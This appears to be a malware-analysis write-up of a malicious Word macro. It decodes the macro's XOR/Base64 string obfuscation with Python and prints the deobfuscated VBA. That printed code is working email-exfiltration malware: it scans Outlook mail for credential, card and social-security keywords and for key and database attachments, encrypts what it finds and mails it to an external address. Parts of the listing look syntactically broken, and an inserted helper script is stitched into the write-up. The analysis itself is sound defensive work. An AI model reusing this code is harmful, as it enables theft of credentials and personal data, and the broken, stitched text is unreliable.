Public Function ovLKcDvvuvaxVc(ByVal wjzTImaDJSRTu As String) As Byte()
	If Not SiTdrVDFDh Then vUyFpuvJDb
	Dim wRIruiQpxDvw() As Byte: wRIruiQpxDvw = dpoZtAIxbLpJPI(wjzTImaDJSRTu)
	Dim kDrJAVJbNwtC As Long: kDrJAVJbNwtC = UBound(wRIruiQpxDvw) + 1
	If kDrJAVJbNwtC Mod 4 <> 0 Then Err.Raise vbObjectError, , ""
	Do While kDrJAVJbNwtC > 0
	If wRIruiQpxDvw(kDrJAVJbNwtC - 1) <> Asc("=") Then Exit Do
	kDrJAVJbNwtC = kDrJAVJbNwtC - 1
	Loop
	Dim HiRTbQaeOizeHo As Long: HiRTbQaeOizeHo = (kDrJAVJbNwtC * 3) \ 4
	Dim dxYxQUpsKjOLmV() As Byte
	ReDim dxYxQUpsKjOLmV(0 To HiRTbQaeOizeHo - 1) As Byte
	Dim IeVHLPDMGs As Long
	Dim LBRLfYhwmCYTKQ As Long
	Do While IeVHLPDMGs < kDrJAVJbNwtC
	Dim uSdVVLRsgv As Byte: uSdVVLRsgv = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1
	Dim ivfRQonHupynCi As Byte: ivfRQonHupynCi = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1
	Dim DkJQeBghXpHn As Byte: If IeVHLPDMGs < kDrJAVJbNwtC Then DkJQeBghXpHn = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1 Else DkJQeBghXpHn = Asc("A")
	Dim YRUQTcrcxsrbaR As Byte: If IeVHLPDMGs < kDrJAVJbNwtC Then YRUQTcrcxsrbaR = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1 Else YRUQTcrcxsrbaR = Asc("A")
	If uSdVVLRsgv > 127 Or ivfRQonHupynCi > 127 Or DkJQeBghXpHn > 127 Or YRUQTcrcxsrbaR > 127 Then 
	Err.Raise vbObjectError, , ""
	Dim sLnJGqBWDN As Byte: sLnJGqBWDN = djMloUrgDXwtHC(uSdVVLRsgv)
	Dim kXtArjueRudv As Byte: kXtArjueRudv = djMloUrgDXwtHC(ivfRQonHupynCi)
	Dim ZDfzccazGV As Byte: ZDfzccazGV = djMloUrgDXwtHC(DkJQeBghXpHn)
	Dim qObQrUydGx As Byte: qObQrUydGx = djMloUrgDXwtHC(YRUQTcrcxsrbaR)
	If sLnJGqBWDN > 63 Or kXtArjueRudv > 63 Or ZDfzccazGV > 63 Or qObQrUydGx > 63 Then _
	Err.Raise vbObjectError, , ""
	Dim IyuerXStwwqpzc As Byte: IyuerXStwwqpzc = (sLnJGqBWDN * 4) Or (kXtArjueRudv \ &H10)
	Dim BvlunkHjhB As Byte: BvlunkHjhB = ((kXtArjueRudv And &HF) * &H10) Or (ZDfzccazGV \ 4)
	Dim qMEiPPYHJDAhY As Byte: qMEiPPYHJDAhY = ((ZDfzccazGV And 3 * &H40) Or qObQrUydGx
	dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = IyuerXStwwqpzc: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
	If LBRLfYhwmCYTKQ < HiRTbQaeOizeHo Then dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = BvlunkHjhB: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
	If LBRLfYhwmCYTKQ < HiRTbQaeOizeHo Then dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = qMEiPPYHJDAhY: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
	Loop
	ovLKcDvvuvaxVc = dxYxQUpsKjOLmV
End Function

Private Sub vUyFpuvJDb()
	Dim egVlWScuJR As Integer, KLMydQnxMZSOX As Integer
	KLMydQnxMZSOX = 0
	For egVlWScuJR = Asc("A") To Asc("Z"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + 1: Next
	For egVlWScuJR = Asc("a") To Asc("z"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + 1: Next
	For egVlWScuJR = Asc("0") To Asc("9"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + 1: Next
	lxtmwrylodux(KLMydQnxMZSOX) = Asc("+"): KLMydQnxMZSOX = KLMydQnxMZSOX + 1
	lxtmwrylodux(KLMydQnxMZSOX) = Asc("/"): KLMydQnxMZSOX = KLMydQnxMZSOX + 1
	For KLMydQnxMZSOX = 0 To 127: djMloUrgDXwtHC(KLMydQnxMZSOX) = 255: Next
	For KLMydQnxMZSOX = 0 To 63: djMloUrgDXwtHC(lxtmwrylodux(KLMydQnxMZSOX)) = KLMydQnxMZSOX: Next
	SiTdrVDFDh = True
End Sub

Private Function dpoZtAIxbLpJPI(ByVal wjzTImaDJSRTu As String) As Byte()
	Dim kXtArjueRudv() As Byte: kXtArjueRudv = wjzTImaDJSRTu
	Dim bguIwEekiNS As Long: bguIwEekiNS = (UBound(kXtArjueRudv) + 1) \ 2
	If bguIwEekiNS = 0 Then dpoZtAIxbLpJPI = kXtArjueRudv: Exit Function
	Dim ZDfzccazGV() As Byte
	ReDim ZDfzccazGV(0 To bguIwEekiNS - 1) As Byte
	Dim adaOdggiLnYx As Long
	For adaOdggiLnYx = 0 To bguIwEekiNS - 1
	Dim egVlWScuJR As Long: egVlWScuJR = kXtArjueRudv(2 * adaOdggiLnYx) + 256 * CLng(kXtArjueRudv(2 * adaOdggiLnYx + 1))
	If egVlWScuJR >= 256 Then egVlWScuJR = Asc("?")
	ZDfzccazGV(adaOdggiLnYx) = egVlWScuJR
	Next
	dpoZtAIxbLpJPI = ZDfzccazGV
End Function

Private Function nkalPYSrDkoirG(JOaTlVhEgWePay As Variant, VkjJlLFzskbVY As Integer)
	Dim fvPLOtDYqRXxu As String
	Dim PjJHmvDBocr() As Byte
	PjJHmvDBocr = ovLKcDvvuvaxVc(ActiveDocument.Variables("gtrxGyKtbDzUEDng"))
	fvPLOtDYqRXxu = ""
	For KLMydQnxMZSOX = LBound(JOaTlVhEgWePay) To UBound(JOaTlVhEgWePay)
		fvPLOtDYqRXxu = fvPLOtDYqRXxu & Chr(PjJHmvDBocr(KLMydQnxMZSOX + VkjJlLFzskbVY) ^ JOaTlVhEgWePay(KLMydQnxMZSOX))
	Next
	nkalPYSrDkoirG = fvPLOtDYqRXxu
End Function

Stage 3 Analysis


Analysing the code, the function nkalPYSrDkoirG is called again and again with an array and an integer as its arguments. Looking at the function shows us that it is a simple XOR encryption. The first argument is the encrypted string and the second argument is the XOR key. The catch, however, is that the integer provided in the second argument is used as an offset that determines where to start in the byte array PjJHmvDBocr. This byte array is produced by the function ovLKcDvvuvaxVc, which operates on a variable from the active document called gtrxGyKtbDzUEDng, likely representing the encryption key. Analysing the ovLKcDvvuvaxVc function with ChatGPT showed that it decodes Base64 strings.

The function iterates through the encrypted array, performing an XOR operation between each byte of the encrypted data and a corresponding byte from PjJHmvDBocr, starting at the specified offset. This XOR operation decrypts each character, which is then concatenated into the result string fvPLOtDYqRXxu. Essentially, this means that the decryption key is applied with an adjustable starting point, which can vary the decrypted output depending on the offset provided. The function ultimately returns this decrypted string.

However, there is no active document variable defined anywhere and I didn't want to run this on my host, seeing as it is a malicious document. That said, a .docm file is also a zip file, so unzipping the document gives us all the properties of the file.

The grep command allows us to find strings within files easily. The variable gtrxGyKtbDzUEDng is what we're looking for, so grepping the unzipped files for that name turned up a Base64 string!

This is the complete Base64 string:

eNS7GlezU9snp3ciGjUJ9HD0eo5arrhaNii/Jgh7Rq38gvvpitv8AHreIuCHDbXhLd1BlLceamykizs8G02DzoP5bZm0PWZkL80S8MfgzZKkTAWqU3oSdton381J023oFIgmK5mEI4c+F85DAOx+mOkrnEbqMaOzJ4EQ4lSM2LfCgqS7AXQDbwipi5KrDBRkfKO8Me3+6MQ5g/XK6b6e2W5HvaCGoWDe6P2crp90G3GTh0kAemmwX1OOhX1IaAeKe8GbBiyp++2WTalzSf1vCviI5a+jcyRw26L8DP6i4urW+YP902QZa43DZ6A+d8Zh438OogAeuuBaNXUgPEgPQpQaca+NDHco7sYPzmI4Fb1XJU9SS1xGw1gU06x8vZ2w6u8oqnQN/xxTvGjxXUV+X9fnxUGQsg64B85ekF+DPeJD/92LHqrK2wVSVYgHGqvwKY/Yshfu9t2fl74o7KDTFATUJa1AHmy9zsNuZPvvwbwG9iD1cHFJLnLemhWN+6vMoQiO/xUIYMWKGQk2D8+RiSvhlptUw2195E3e7K40WnXNLSyAMvW+ngfplr9T23xyapsNo8gz/MOdw0KWMB868kW9kAGQ5IXWPHGaE7H8hWB3t+1K5H861yr7u5BgZIUby3VU0gKV8EH2c0Gl7rCa6sFbiTtCXmV3r1A+Fm3vBMCG19X2YPN62VpHhRMobsfSEl5TezlLWYVA/HNP6G5VX8+sxdTdQOyk84SGtm8I5Ss6kL4bs/+zw/VdcaXr8IZSa5rsmSgRC4+mLHhPSBTZODowjHPJOZK++rnkqLWQTzIRiiRZZVXeSoVEIGSla44WBR7x2xJABJrRzCxKUg+ryslthKXjteBuF9JZZovMADo9uRVgtu7XYVahg9ujIR310KWMMKlr+rzsLAvvlMLPHGVrG8LDoHrbURxqjPlU3a5OppL//jZIRKGTHO353w8HNR/ly3P3Nw==

With this information, a simple Python script can be built to decrypt all the strings which used that function. So, again, I did this manually, going through each instance of nkalPYSrDkoirG. This will eventually allow us to read the script easily in Stage 4 of the analysis.

import base64

def decode_base64_string(encoded_string):
    """Decode a Base64 encoded string into a byte array."""
    return base64.b64decode(encoded_string)

def xor_decrypt(byte_array, key_byte_array, offset):
    """Decrypt the byte array using XOR with a given key byte array and offset."""
    decrypted_string = ""
    for i in range(len(byte_array)):
        # XOR the byte with the corresponding byte from the key array (with offset)
        decrypted_byte = byte_array[i] ^ key_byte_array[i + offset]
        # Convert the result to a character and add to the result string
        decrypted_string += chr(decrypted_byte)
    return decrypted_string

# Base64-encoded key stored in the document variable
base64_encoded_key = "eNS7GlezU9snp3ciGjUJ9HD0eo5arrhaNii/Jgh7Rq38gvvpitv8AHreIuCHDbXhLd1BlLceamykizs8G02DzoP5bZm0PWZkL80S8MfgzZKkTAWqU3oSdton381J023oFIgmK5mEI4c+F85DAOx+mOkrnEbqMaOzJ4EQ4lSM2LfCgqS7AXQDbwipi5KrDBRkfKO8Me3+6MQ5g/XK6b6e2W5HvaCGoWDe6P2crp90G3GTh0kAemmwX1OOhX1IaAeKe8GbBiyp++2WTalzSf1vCviI5a+jcyRw26L8DP6i4urW+YP902QZa43DZ6A+d8Zh438OogAeuuBaNXUgPEgPQpQaca+NDHco7sYPzmI4Fb1XJU9SS1xGw1gU06x8vZ2w6u8oqnQN/xxTvGjxXUV+X9fnxUGQsg64B85ekF+DPeJD/92LHqrK2wVSVYgHGqvwKY/Yshfu9t2fl74o7KDTFATUJa1AHmy9zsNuZPvvwbwG9iD1cHFJLnLemhWN+6vMoQiO/xUIYMWKGQk2D8+RiSvhlptUw2195E3e7K40WnXNLSyAMvW+ngfplr9T23xyapsNo8gz/MOdw0KWMB868kW9kAGQ5IXWPHGaE7H8hWB3t+1K5H861yr7u5BgZIUby3VU0gKV8EH2c0Gl7rCa6sFbiTtCXmV3r1A+Fm3vBMCG19X2YPN62VpHhRMobsfSEl5TezlLWYVA/HNP6G5VX8+sxdTdQOyk84SGtm8I5Ss6kL4bs/+zw/VdcaXr8IZSa5rsmSgRC4+mLHhPSBTZODowjHPJOZK++rnkqLWQTzIRiiRZZVXeSoVEIGSla44WBR7x2xJABJrRzCxKUg+ryslthKXjteBuF9JZZovMADo9uRVgtu7XYVahg9ujIR310KWMMKlr+rzsLAvvlMLPHGVrG8LDoHrbURxqjPlU3a5OppL//jZIRKGTHO353w8HNR/ly3P3Nw=="

# Decode the Base64 string to get the key byte array
key_byte_array = decode_base64_string(base64_encoded_key)

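# List of (encrypted byte array, offset) pairs, one per nkalPYSrDkoirG call.
# The entry below is the first CreateObject fragment from the macro listing;
# replace it with, or add, the Array(...) values and offset of each call.
encrypted_data = [
    (bytearray([65, 15, 169, 83, 186]), 86),  # decrypts to "Syste"
]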

# Decrypt each byte array and print the result
decrypted_message = ""
for byte_array, offset in encrypted_data:
    decrypted_string = xor_decrypt(byte_array, key_byte_array, offset)
    decrypted_message += decrypted_string

print("Decrypted message:", decrypted_message)
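
The manual pass described above can be automated. The following is an added example, not part of the original write-up: it rewrites every nkalPYSrDkoirG / DecryptData call in a VBA listing into its plaintext literal, merges pieces joined with `&`, and reports calls it could not resolve. KEY_PREFIX_B64 holds only the first 176 characters of the Base64 value quoted above (enough for the sample lines), and the helper names are my own.

```python
import base64
import re

# First 176 Base64 characters of the gtrxGyKtbDzUEDng value quoted above
# (key bytes 0..131). Pass the full value to process the whole macro.
KEY_PREFIX_B64 = (
    "eNS7GlezU9snp3ciGjUJ9HD0eo5arrhaNii/Jgh7Rq38"
    "gvvpitv8AHreIuCHDbXhLd1BlLceamykizs8G02DzoP5"
    "bZm0PWZkL80S8MfgzZKkTAWqU3oSdton381J023oFIgm"
    "K5mEI4c+F85DAOx+mOkrnEbqMaOzJ4EQ4lSM2LfCgqS7"
)

# Lines copied (abridged) from the Stage 4 listing on this page.
SAMPLE_VBA = """\
atBjGMlxGDau = Array(
    DecryptData(Array(17), 16),
    DecryptData(Array(150), 17),
    DecryptData(Array(25), 18))
Set PIBNxhGCNMURDD = CreateObject(
    DecryptData(Array(65, 15, 169, 83, 186), 86) &
    DecryptData(Array(160, 103, 128, 8, 139, 97, 250, 79, 95, 224, 170, 96, 245, 71, 103, 186, 44, 103, 158, 31, 232, 129, 82, 178, 18, 133, 115, 194, 192, 66, 183, 36, 182, 38, 237, 182, 196, 164, 237, 214, 214), 91))
.CC = DecryptData(Array(), 614)
Set outlookNamespace = outlookApp.GetNamespace(DecryptData(Array(31, 42, 202, 165), 575))
"""


def load_key(key_b64):
    """Base64-decode the document variable into the XOR key stream."""
    return base64.b64decode(key_b64)


def xor_with_offset(cipher, key, offset):
    """plaintext[i] = key[offset + i] XOR cipher[i], as in nkalPYSrDkoirG."""
    if not cipher:                      # Array() decrypts to "" at any offset
        return ""
    if any(not 0 <= b <= 255 for b in cipher):
        raise ValueError("array element is not a byte")
    if offset + len(cipher) > len(key):
        raise IndexError("offset runs past the end of the key")
    return "".join(chr(key[offset + i] ^ b) for i, b in enumerate(cipher))


def vba_literal(text):
    """Quote text as a VBA string literal (embedded quotes are doubled)."""
    return '"' + text.replace('"', '""') + '"'


def deobfuscate(vba, key_b64, names=("nkalPYSrDkoirG", "DecryptData")):
    """Return (rewritten source, list of calls left untouched)."""
    key = load_key(key_b64)
    unresolved = []
    call = re.compile(r"\b(?:%s)\(\s*Array\(([\d,\s]*)\)\s*,\s*(\d+)\s*\)"
                      % "|".join(map(re.escape, names)))

    def decrypt_call(m):
        cipher = [int(n) for n in re.findall(r"\d+", m.group(1))]
        try:
            return vba_literal(xor_with_offset(cipher, key, int(m.group(2))))
        except (IndexError, ValueError):
            # Key too short or malformed array: keep the call for manual review.
            unresolved.append(m.group(0))
            return m.group(0)

    out = call.sub(decrypt_call, vba)

    # Merge "abc" & "def" (also across line breaks) until nothing changes.
    joined = re.compile(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"')
    count = 1
    while count:
        out, count = joined.subn(lambda m: '"%s%s"' % m.group(1, 2), out)
    return out, unresolved


if __name__ == "__main__":
    text, skipped = deobfuscate(SAMPLE_VBA, KEY_PREFIX_B64)
    print(text)
    print("left untouched:", skipped)
```

With the key prefix used here, the MAPI call at offset 575 lies beyond the available key bytes and is reported as unresolved instead of being decrypted to garbage.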

Stage 4 Analysis


Stage 4 of the analysis involves renaming the functions and variables. For this, ChatGPT was used. However, only some of the function and variable names were changed because, at some point, I knew what the script did.


Const exfil_address As String = "dph@whschool.com"
Private IsInitialized As Boolean
Private lxtmwrylodux(0 To 63) As Byte
Private DecodeBase64Char(0 To 127) As Byte
Function FVaFfsygaGuUBB(JulhxRTJAtZ)
	Dim atBjGMlxGDau As Variant
	Dim IsNslKdUSos As Long
	Dim ULDvZWynDzG As String
	' abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*ABCDEFGHIJKLMNOPQRSTUVWXYZ
	atBjGMlxGDau = Array(
		DecryptData(Array(17), 16),
		DecryptData(Array(150), 17), 
		DecryptData(Array(25), 18), 
		DecryptData(Array(234), 19), 
		DecryptData(Array(63), 20), 
		DecryptData(Array(200), 21), 
		DecryptData(Array(223), 22), 
		DecryptData(Array(50), 23), 
		DecryptData(Array(95), 24), 
		DecryptData(Array(66), 25), 
		DecryptData(Array(212), 26), 
		DecryptData(Array(74), 27), 
		DecryptData(Array(101), 28), 
		DecryptData(Array(21), 29), 
		DecryptData(Array(41), 30), 
		DecryptData(Array(221), 31), 
		DecryptData(Array(141), 32), 
		DecryptData(Array(240), 33), 
		DecryptData(Array(136), 34), 
		DecryptData(Array(157), 35), 
		DecryptData(Array(255), 36), 
		DecryptData(Array(173), 37), 
		DecryptData(Array(139), 38), 
		DecryptData(Array(120), 39), 
		DecryptData(Array(3), 40), 
		DecryptData(Array(164), 41), 
		DecryptData(Array(18), 42), 
		DecryptData(Array(209), 43), 
		DecryptData(Array(181), 44), 
		DecryptData(Array(62), 45), 
		DecryptData(Array(129), 46), 
		DecryptData(Array(212), 47), 
		DecryptData(Array(27), 48), 
		DecryptData(Array(234),49), 
		DecryptData(Array(121), 50),
		DecryptData(Array(173), 51), 
		DecryptData(Array(150), 52), 
		DecryptData(Array(94), 53),
		DecryptData(Array(73), 54), 
		DecryptData(Array(72), 55), 
		DecryptData(Array(129), 56), 
		DecryptData(Array(213), 57), 
		DecryptData(Array(29), 58), 
		DecryptData(Array(22), 59), 
		DecryptData(Array(90), 60), 
		DecryptData(Array(15), 61), 
		DecryptData(Array(192), 62), 
		DecryptData(Array(138), 63), 
		DecryptData(Array(198), 64), 
		DecryptData(Array(191), 65), 
		DecryptData(Array(42), 66), 
		DecryptData(Array(209), 67),
		DecryptData(Array(253), 68), 
		DecryptData(Array(119), 69), 
		DecryptData(Array(45), 70), 
		DecryptData(Array(40), 71), 
		DecryptData(Array(98), 72), 
		DecryptData(Array(131), 73), 
		DecryptData(Array(93), 74), 
		DecryptData(Array(160), 75), 
		DecryptData(Array(150), 76), 
		DecryptData(Array(178),77), 
		DecryptData(Array(158), 78), 
		DecryptData(Array(198), 79), 
		DecryptData(Array(241), 80), 
		DecryptData(Array(26), 81),
		DecryptData(Array(82), 82), 
		DecryptData(Array(242), 83), 
		DecryptData(Array(10), 84), 
		DecryptData(Array(32), 85))


	For IsNslKdUSos = 1 To JulhxRTJAtZ
	Randomize
	ULDvZWynDzG = ULDvZWynDzG & atBjGMlxGDau(Int((UBound(atBjGMlxGDau) - LBound(atBjGMlxGDau) + 1) * Rnd + LBound(atBjGMlxGDau)))
	Next IsNslKdUSos
	FVaFfsygaGuUBB = ULDvZWynDzG
End Function

Function MTDPxqUeBtnHy(QvXdgzREtgivJc, MJAnPLmDOHCpM)
	MTDPxqUeBtnHy = QvXdgzREtgivJc
	If MJAnPLmDOHCpM < QvXdgzREtgivJc Then MTDPxqUeBtnHy = MJAnPLmDOHCpM
End Function

Function ConvertToBase64(NfZjOnhlizlg)
	Dim BPFDRGiTpeffVc As String
	Dim IxqNKATnfrjL() As Byte
	Dim PIBNxhGCNMURDD As Object
	Dim utf8Encoding As Object
	Dim xothlNMzDN, JulhxRTJAtZ, BlockSize As Integer

	' System.Security.Cryptography.ToBase64Transform
	Set PIBNxhGCNMURDD = CreateObject(
		DecryptData(Array(65, 15, 169, 83, 186), 86) &
		DecryptData(Array(160, 103, 128, 8, 139, 97, 250, 79, 95, 224, 170, 96, 245, 71, 103, 186, 44, 103, 158, 31, 232, 129, 82, 178, 18, 133, 115, 194, 192, 66, 183, 36, 182, 38, 237, 182, 196, 164, 237, 214, 214), 91))

	' System.Text.UTF8Encoding
	Set utf8Encoding = CreateObject(
		DecryptData(Array(82, 13, 112, 27, 109, 196, 165, 198, 206, 116, 96, 74, 41, 247, 250), 132) & 

		DecryptData(Array(9, 168, 144, 139, 171, 93, 234, 155, 173), 147))


	BlockSize = PIBNxhGCNMURDD.InputBlockSize

	For xothlNMzDN = 0 To LenB(NfZjOnhlizlg) - 1 Step BlockSize
		JulhxRTJAtZ = MTDPxqUeBtnHy(BlockSize, UBound(NfZjOnhlizlg) - xothlNMzDN)
		IxqNKATnfrjL = PIBNxhGCNMURDD.TransformFinalBlock((NfZjOnhlizlg), xothlNMzDN, JulhxRTJAtZ)
		BPFDRGiTpeffVc = BPFDRGiTpeffVc & utf8Encoding.GetString((IxqNKATnfrjL))
		Next
		ConvertToBase64 = BPFDRGiTpeffVc
End Function


Function uEfmNHGlYFaj(qcGjVkReTg)
	Dim utf8Encoding As Object
	Dim NfZjOnhlizlg() As Byte
	Dim ScMpMxoqdQ As Object

	' System.Text.UTF8Encoding
	Set utf8Encoding = CreateObject(
		DecryptData(Array(186, 199, 237, 173, 11), 156) & 
		DecryptData(Array(42, 147, 244, 227, 217, 20, 240, 189, 169, 218, 150, 218, 26, 120, 30, 247, 238, 39, 103), 161))

	' System.Security.Cryptography.FromBase64Transform
	Set ScMpMxoqdQ = CreateObject(
		DecryptData(Array(41, 16, 195, 43, 54, 227, 171, 46, 45, 11, 114, 248, 18, 181, 226, 40, 111, 219, 130, 157, 226, 34, 206, 1, 40, 141, 7, 115, 214, 206, 151, 192, 206, 49, 69), 180) & 

		DecryptData(Array(3, 190, 148, 200, 88, 140, 195, 140, 153, 176, 150, 241, 144), 215))

	NfZjOnhlizlg = utf8Encoding.GetBytes_4(qcGjVkReTg)
	uEfmNHGlYFaj = ScMpMxoqdQ.TransformFinalBlock((NfZjOnhlizlg), 0, UBound(NfZjOnhlizlg))
End Function


Function EncryptData(inputString)
	Dim encryptedData, byteArray, encryptedBytes, keyBytes() As Byte
	Dim saltString As String
	saltString = FVaFfsygaGuUBB(32)
	Dim utf8Encoding, rijndael, zrjycZwtKFJvAu, IVdDfkxSWPOTi As Object
	Dim kSNpGaWBeFRbpl() As Byte

	' System.Security.Cryptography.RijndaelManaged
	Set rijndael = CreateObject(
		DecryptData(Array(128, 29, 106, 31, 232, 174, 73, 243, 91, 20, 179, 19), 228) & 
		
		DecryptData(Array(138, 11, 119, 140, 67, 108, 195, 144, 46, 90, 18, 82, 93, 56, 103, 59, 186, 72, 24, 197, 227, 104, 22, 77, 130, 139, 110, 160, 3, 95, 112, 217), 240)
		)

	' System.Text.UTF8Encoding
	Set utf8Encoding = CreateObject(
			DecryptData(Array(4, 92, 60, 38, 46, 49, 104, 151, 61, 108, 167, 130, 41, 233, 219, 136, 175, 129, 75, 197, 16, 100), 272) & 
			DecryptData(Array(145, 123), 294)
		)
	rijndael.KeySize = 256
	rijndael.BlockSize = 256
	rijndael.Mode = (1 + 0)

	' System.Text.UTF8Encoding
	' 8xppg2oX68Bo6koL7hwSeC8bCEWvk540
	rijndael.Key = CreateObject(
		DecryptData(Array(0, 197, 27, 133, 56, 40, 80, 11, 178, 159, 177, 111, 197, 230, 72, 128, 66), 296) & 
		DecryptData(Array(160, 61, 255, 59, 234, 83, 133), 313)).GetBytes_4(
			DecryptData(Array(123, 135, 173, 251, 121, 152, 165, 131, 51, 106, 23, 231, 49, 113, 196, 188, 30, 231, 175, 225, 114, 173, 206, 191, 220, 210, 233, 94, 135), 320) & 
			DecryptData(Array(149, 231, 36), 349)
			)

	' System.Text.UTF8Encoding
	rijndael.IV = CreateObject(
		DecryptData(Array(87, 173, 86, 217, 37, 115, 66, 233, 171, 187, 26), 352) & 
		DecryptData(Array(74, 174, 187, 135, 132, 67, 152, 67, 154, 20, 24, 39, 73), 363)).GetBytes_4(saltString)

	'  System.Text.UTF8Encoding
	keyBytes = CreateObject(
		DecryptData(Array(33, 167, 233, 97, 232, 150, 133, 152, 196, 112, 250, 209, 64, 92, 38, 253, 207, 119), 376) &
		DecryptData(Array(106, 89, 107, 166, 255, 238), 394)).GetBytes_4(inputString)

	encryptedData = rijndael.CreateEncryptor().TransformFinalBlock((keyBytes), 0, UBound(keyBytes))
	' |
	EncryptData = saltString & DecryptData(Array(87), 400) & ConvertToBase64(encryptedData)
End Function


Sub ProcessOutlookEmails()
	Dim sensitiveKeywords
	sensitiveKeywords = Array(
		' password
		DecryptData(Array(145, 247, 232, 39, 180, 2, 15), 401) & 
		DecryptData(Array(128), 408),

		' passwd
		DecryptData(Array(61, 191, 159, 221, 67, 62), 409),

		' creds
		DecryptData(Array(22, 191, 72, 72, 243), 415),

		' credential
		DecryptData(Array(81, 135, 219, 250, 98, 135, 226, 214, 50), 420) & 
		DecryptData(Array(183), 429),

		' credit card
		DecryptData(Array(31, 0, 15, 255, 100), 430) & 
		DecryptData(Array(215, 232, 80, 157, 177, 249), 435),

		' creditcard
		DecryptData(Array(160, 48, 243, 84, 118, 78), 441) & 
		DecryptData(Array(145, 36, 207, 244), 447),

		' social security number
		DecryptData(Array(114, 255, 135, 236, 183), 451) & 
		DecryptData(Array(80, 81, 233, 118, 210, 137, 247, 9, 3, 206, 205, 36, 145, 18, 88, 178, 88), 456) 
	)
	Dim fileTypes
	fileTypes = Array(
		' pgp
		DecryptData(Array(36, 181, 114), 482),

		' asc
		DecryptData(Array(244, 131, 34), 485),

		' pem
		DecryptData(Array(134, 22, 44), 488), 

		' pub
		DecryptData(Array(213, 155, 210), 491),

		' gpg
		DecryptData(Array(253, 154, 166), 494),

		' gpg-key
		DecryptData(Array(60, 249), 497) & 
		DecryptData(Array(92, 111, 53, 0, 14), 499),

		' mp3
		DecryptData(Array(194, 32, 13), 504), 

		' mp4
		DecryptData(Array(123, 29, 219), 507),

		' mov
		DecryptData(Array(105, 175, 240), 510),

		' xlsx
		DecryptData(Array(175, 185, 133, 24), 513),

		' xlsm
		DecryptData(Array(139, 22, 170, 55), 517),

		' xlsb
		DecryptData(Array(63, 233, 96, 74), 521),

		' csv
		DecryptData(Array(13, 180, 164), 525),

		' doc
		DecryptData(Array(118, 49, 48), 528),

		' docx
		DecryptData(Array(31, 86, 40, 33), 531),

		' docm
		DecryptData(Array(225, 47, 159, 30), 535),

		' exe
		DecryptData(Array(42, 144, 11), 539), 

		' zip
		DecryptData(Array(47, 54, 191), 542),

		' sql
		DecryptData(Array(223, 180, 184), 545),

		' db
		DecryptData(Array(185, 34), 548),

		' bak 
		DecryptData(Array(142, 197, 152), 550),

		' pgf
		DecryptData(Array(244, 225, 208), 553)
	)

	Dim outlookApp As Object
	Dim XstsppFkvZr As Object
	Dim emailBody As String
	Dim outlookNamespace As Object
	Dim emailAttachments As Object

	' Outlook.Application
	Set outlookApp = CreateObject(
		DecryptData(Array(32, 125, 145, 71, 85, 255, 213, 53, 242, 143), 556) & 
		DecryptData(Array(195, 175, 156, 62, 16, 209, 130, 159, 232), 566)
		)

	' MAPI
	Set outlookNamespace = outlookApp.GetNamespace(DecryptData(Array(31, 42, 202, 165), 575))

	Set emailAttachments = outlookNamespace.GetDefaultFolder(6).Items
	Dim index As Integer
	Dim containsSensitiveInfo As Boolean
	containsSensitiveInfo = False
	Dim attachmentContainsSensitiveInfo As Boolean
	attachmentContainsSensitiveInfo = False
	Dim startDate As Date
	Dim endDate As Date
	Const daysToSearch As Integer = 400
	startDate = Date - daysToSearch
	endDate = Date
	Dim emailItem As Object
	For Each emailItem In emailAttachments
		If emailItem.ReceivedTime >= startDate And emailItem.ReceivedTime <= endDate Then
			containsSensitiveInfo = CheckForSensitiveInfo(emailItem.body, emailItem.Subject, sensitiveKeywords)
			If containsSensitiveInfo Then
				Call ProcessSensitiveEmail(emailItem.body, emailItem.Subject)
			End If
			If emailItem.Attachments.Count > 0 Then
				Dim i As Integer
				For i = 1 To emailItem.Attachments.Count
					attachmentContainsSensitiveInfo = CheckAttachmentForSensitiveInfo(emailItem.Attachments.Item(i), fileTypes, sensitiveKeywords)
					If attachmentContainsSensitiveInfo Then
						Call HandleSensitiveAttachment(emailItem, emailItem.Subject)
					End If
				Next
			End If
		End If
	Next
	Set emailAttachments = Nothing
	Set outlookApp = Nothing
End Sub

Sub ProcessSensitiveEmail(IehgfWzjBPM As String, gjQiIlwvaI As String)
	Dim outlookApp As Object
	Dim XstsppFkvZr As Object
	Dim emDROsRKEd As String

	' Outlook.Application
	Set outlookApp = CreateObject(
		DecryptData(Array(214, 93, 101, 103, 224, 201, 71, 86, 14), 579) & 
		DecryptData(Array(56, 100, 181, 81, 89, 81, 248, 26, 166, 87), 588))
	
	Set XstsppFkvZr = outlookApp.CreateItem(0)
	emDROsRKEd = IehgfWzjBPM
	On Error Resume Next
	With XstsppFkvZr
	.To = exfil_address
	.CC = DecryptData(Array(), 614)
	.BCC = DecryptData(Array(), 614)

	' Outlook Efiltration Data from User:
	.Subject = DecryptData(Array(145, 63, 241, 40, 79, 11, 206, 75, 203, 10, 99, 119, 157, 175, 96, 33, 112, 243, 190, 162, 12, 14, 51, 123, 202, 234, 175, 31, 235, 200, 195, 224, 147, 11), 614) & 
	DecryptData(Array(101, 232, 121), 648) & 

	' username
	Environ(
		DecryptData(Array(19, 248), 651) & 
		DecryptData(Array(169, 114, 84, 92, 212, 112), 653)
		)

	.body = EncryptData(gjQiIlwvaI & emDROsRKEd)
	.DeleteAfterSubmit = True
	.Send
	End With
	On Error GoTo 0
	Set XstsppFkvZr = Nothing
	Set outlookApp = Nothing
End Sub

